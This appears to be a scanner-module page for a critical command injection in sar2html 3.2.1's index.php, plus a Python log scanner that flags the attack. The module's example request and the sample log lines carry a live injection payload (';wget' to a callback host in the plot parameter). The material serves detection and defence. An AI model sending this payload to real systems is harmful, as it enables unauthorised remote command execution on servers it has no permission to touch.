sar2html 3.2.1 - Remote Command Injection

By kannthu

Critical
Vidoc Module
#sar2html #rce #oast #edb
Description

What is the "sar2html 3.2.1 - Remote Command Injection" module?

The "sar2html 3.2.1 - Remote Command Injection" module is designed to detect a vulnerability in the SAR2HTML software. SAR2HTML is a tool used for generating graphical reports from system activity data collected by the SAR command. This module focuses on a specific version of SAR2HTML (3.2.1) and identifies a critical remote command injection vulnerability.

The severity of this vulnerability is classified as critical, indicating that it poses a significant risk to the affected system. It allows a remote attacker to execute arbitrary commands on the target system by exploiting a command injection flaw in the index.php script of SAR2HTML.

This module was authored by gy741.

Impact

If successfully exploited, this vulnerability could allow an attacker to execute arbitrary commands on the target system. This can lead to unauthorized access, data theft, system compromise, and potential disruption of services.

How does the module work?

The module works by sending a specially-crafted HTTP request to the target system's index.php script. The request includes a command injection payload that exploits the vulnerability in SAR2HTML 3.2.1. Upon successful exploitation, the attacker gains the ability to execute arbitrary commands on the target system.

Here is an example of the HTTP request used by the module:

GET /index.php?plot=;wget%20http://{%InteractionURL%} HTTP/1.1
Host: {%Hostname%}
Accept: */*

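The module also includes matching conditions to ensure accurate detection. In this case, it checks for the word "http" as the protocol of the interaction recorded for the interaction URL: an HTTP callback from the target means the injected wget command ran, which indicates a successful match.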
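A defender-side counterpart to the request above, as an added example that is not part of the Vidoc module or the original page: it scans web access log lines for requests to index.php whose plot parameter decodes to a value containing shell metacharacters. The log lines, IP addresses and callback host are constructed, and the rule that a legitimate plot value never contains such characters is an assumption.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate plot value never contains shell metacharacters.
SHELL_META_RE = re.compile(r'[;|&`$<>\n\r]')

# Constructed sample log lines (documentation IPs, placeholder callback host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?plot=host1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?plot=;wget%20http://callback.example.invalid HTTP/1.1" 200 5200',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /sar2html/index.php?plot=%3Bwget+http://callback.example.invalid HTTP/1.1" 200 5200',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /status.php?plot=;x HTTP/1.1" 404 0',
]

def plot_values(target):
    """Yield the decoded value of every plot= parameter in a request target."""
    # Split on the raw "&" before decoding so an encoded %26 stays in the value.
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "plot":
            yield unquote_plus(value)

def suspicious_requests(log_lines):
    """Return (client_ip, decoded_plot_value) for each suspicious request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        # index.php may also be served as the directory index ("/").
        if not urlsplit(target).path.endswith(("index.php", "/")):
            continue
        for value in plot_values(target):
            if SHELL_META_RE.search(value):
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} plot={value!r}")
```

Decoding before matching is what catches the percent-encoded variant in the third sample line, which a plain-text search for ";wget" in the raw log would miss.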

Module preview

Concurrent Requests (1)

1. HTTP Request template
   Raw request
   Matching conditions: word: http

Passive global matcher: No matching conditions.

On match action: Report vulnerability